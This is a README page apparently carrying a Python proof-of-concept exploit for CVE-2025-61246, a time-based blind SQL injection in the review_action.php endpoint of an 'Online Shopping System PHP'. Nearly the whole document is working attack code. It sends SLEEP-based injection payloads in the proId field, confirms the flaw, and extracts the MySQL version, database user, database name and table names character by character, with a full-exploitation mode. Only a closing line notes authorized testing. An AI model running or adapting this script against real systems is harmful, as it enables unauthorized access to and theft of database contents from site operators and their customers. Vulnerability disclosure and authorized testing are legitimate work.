README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-61246 - SQL Injection PoC Exploit
Author: Govind Pratap Singh
Description: Automated exploitation tool for time-based blind SQL injection
in Online Shopping System PHP - review_action.php endpoint
"""
import requests
import argparse
import time
import sys
import string
from urllib.parse import urlparse
from colorama import Fore, Style, init
# Initialize colorama
init(autoreset=True)
class SQLInjectionExploit:
def __init__(self, target_url, timeout=5, proxy=None, verbose=False):
self.target_url = target_url
self.timeout = timeout
self.proxy = {"http": proxy, "https": proxy} if proxy else None
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
def log(self, message, level="info"):
"""Print colored log messages"""
colors = {
"info": Fore.CYAN,
"success": Fore.GREEN,
"warning": Fore.YELLOW,
"error": Fore.RED,
"progress": Fore.MAGENTA
}
print(f"{colors.get(level, Fore.WHITE)}[{level.upper()}] {message}{Style.RESET_ALL}")
def send_payload(self, payload):
"""Send SQL injection payload and measure response time"""
data = {"proId": payload}
try:
start_time = time.time()
response = self.session.post(
self.target_url,
data=data,
timeout=self.timeout + 10,
proxies=self.proxy,
verify=False
)
elapsed_time = time.time() - start_time
if self.verbose:
self.log(f"Payload: {payload[:50]}... | Response Time: {elapsed_time:.2f}s", "progress")
return elapsed_time, response
except requests.exceptions.Timeout:
self.log("Request timeout - possible SQL injection confirmed", "warning")
return self.timeout + 10, None
except Exception as e:
self.log(f"Error sending payload: {str(e)}", "error")
return 0, None
def detect_vulnerability(self):
"""Detect if the target is vulnerable to SQL injection"""
self.log("Starting vulnerability detection...", "info")
# Baseline request
baseline_time, _ = self.send_payload("1")
# Time-based SQL injection payload (5 second delay)
sqli_payload = f"1' AND (SELECT 1 FROM (SELECT(SLEEP({self.timeout})))a)-- -"
sqli_time, _ = self.send_payload(sqli_payload)
# Check if there's a significant time difference
if sqli_time - baseline_time >= self.timeout - 1:
self.log("✓ Target is VULNERABLE to SQL Injection!", "success")
self.log(f" Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "success")
return True
else:
self.log("✗ Target does not appear vulnerable", "warning")
self.log(f" Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "info")
return False
def extract_database_name(self):
"""Extract database name using time-based blind SQL injection"""
self.log("Extracting database name...", "info")
db_name = ""
charset = string.ascii_lowercase + string.digits + "_"
# First, get the length of database name
for length in range(1, 50):
payload = f"1' AND IF(LENGTH(DATABASE())={length}, SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
self.log(f"Database name length: {length}", "success")
break
else:
self.log("Could not determine database name length", "error")
return None
# Extract each character
for position in range(1, length + 1):
for char in charset:
payload = f"1' AND IF(SUBSTRING(DATABASE(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
db_name += char
self.log(f"Database name: {db_name}", "progress")
break
self.log(f"✓ Database name extracted: {db_name}", "success")
return db_name
def extract_mysql_version(self):
"""Extract MySQL version"""
self.log("Extracting MySQL version...", "info")
version = ""
charset = string.digits + "."
for position in range(1, 20):
found = False
for char in charset:
payload = f"1' AND IF(SUBSTRING(VERSION(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
version += char
self.log(f"MySQL Version: {version}", "progress")
found = True
break
if not found:
break
self.log(f"✓ MySQL version: {version}", "success")
return version
def extract_current_user(self):
"""Extract current database user"""
self.log("Extracting current database user...", "info")
user = ""
charset = string.ascii_lowercase + string.digits + "@._-"
# Get length
for length in range(1, 100):
payload = f"1' AND IF(LENGTH(USER())={length}, SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
self.log(f"User length: {length}", "success")
break
else:
self.log("Could not determine user length", "error")
return None
# Extract each character
for position in range(1, length + 1):
for char in charset:
payload = f"1' AND IF(SUBSTRING(USER(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
user += char
self.log(f"Current user: {user}", "progress")
break
self.log(f"✓ Current user: {user}", "success")
return user
def count_tables(self):
"""Count number of tables in current database"""
self.log("Counting tables in database...", "info")
for count in range(1, 100):
payload = f"1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())={count}, SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
self.log(f"✓ Number of tables: {count}", "success")
return count
self.log("Could not determine table count", "error")
return None
def extract_table_names(self, limit=5):
"""Extract table names from current database"""
self.log(f"Extracting table names (limit: {limit})...", "info")
tables = []
charset = string.ascii_lowercase + string.digits + "_"
for table_index in range(limit):
table_name = ""
# Get table name length
for length in range(1, 50):
payload = f"1' AND IF(LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1))={length}, SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
break
else:
break # No more tables
# Extract each character
for position in range(1, length + 1):
for char in charset:
payload = f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
elapsed_time, _ = self.send_payload(payload)
if elapsed_time >= self.timeout - 1:
table_name += char
self.log(f"Table {table_index + 1}: {table_name}", "progress")
break
if table_name:
tables.append(table_name)
self.log(f"✓ Table extracted: {table_name}", "success")
return tables
def full_exploitation(self):
"""Perform full exploitation chain"""
self.log("=" * 60, "info")
self.log("CVE-2025-61246 - Full Exploitation Mode", "info")
self.log("=" * 60, "info")
if not self.detect_vulnerability():
self.log("Target is not vulnerable. Exiting.", "error")
return
print()
# Extract information
mysql_version = self.extract_mysql_version()
print()
current_user = self.extract_current_user()
print()
db_name = self.extract_database_name()
print()
table_count = self.count_tables()
print()
if table_count and table_count > 0:
tables = self.extract_table_names(min(3, table_count))
print()
self.log("=" * 60, "info")
self.log("Exploitation Summary", "success")
self.log("=" * 60, "info")
self.log(f"MySQL Version: {mysql_version}", "info")
self.log(f"Current User: {current_user}", "info")
self.log(f"Database Name: {db_name}", "info")
self.log(f"Table Count: {table_count}", "info")
if tables:
self.log(f"Sample Tables: {', '.join(tables)}", "info")
self.log("=" * 60, "info")
def print_banner():
"""Print tool banner"""
banner = f"""
{Fore.RED}╔═══════════════════════════════════════════════════════════╗
║ ║
║ CVE-2025-61246 SQL Injection PoC ║
║ Online Shopping System PHP - Exploit Tool ║
║ ║
║ Discovered by: Govind Pratap Singh ║
║ ║
╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL}
"""
print(banner)
def main():
print_banner()
parser = argparse.ArgumentParser(
description="CVE-2025-61246 SQL Injection Exploitation Tool",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python exploit.py --url http://target.com/review_action.php --detect-only
python exploit.py --url http://target.com/review_action.php --extract-db
python exploit.py --url http://target.com/review_action.php --full-exploit
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
"""
)
parser.add_argument("-u", "--url", required=True, help="Target URL (review_action.php endpoint)")
parser.add_argument("-d", "--detect-only", action="store_true", help="Only detect vulnerability")
parser.add_argument("-e", "--extract-db", action="store_true", help="Extract database name")
parser.add_argument("-f", "--full-exploit", action="store_true", help="Full exploitation mode")
parser.add_argument("-t", "--timeout", type=int, default=5, help="SQL delay timeout (default: 5)")
parser.add_argument("-p", "--proxy", help="Proxy URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
args = parser.parse_args()
# Validate URL
try:
result = urlparse(args.url)
if not all([result.scheme, result.netloc]):
print(f"{Fore.RED}[ERROR] Invalid URL format{Style.RESET_ALL}")
sys.exit(1)
except Exception:
print(f"{Fore.RED}[ERROR] Invalid URL{Style.RESET_ALL}")
sys.exit(1)
# Initialize exploit
exploit = SQLInjectionExploit(
target_url=args.url,
timeout=args.timeout,
proxy=args.proxy,
verbose=args.verbose
)
# Execute based on arguments
if args.detect_only:
exploit.detect_vulnerability()
elif args.extract_db:
if exploit.detect_vulnerability():
print()
exploit.extract_database_name()
elif args.full_exploit:
exploit.full_exploitation()
else:
# Default: detection only
exploit.detect_vulnerability()
print()
print(f"{Fore.YELLOW}[WARNING] This tool is for authorized testing only!{Style.RESET_ALL}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] Interrupted by user{Style.RESET_ALL}")
sys.exit(0)
except Exception as e:
print(f"{Fore.RED}[ERROR] {str(e)}{Style.RESET_ALL}")
sys.exit(1)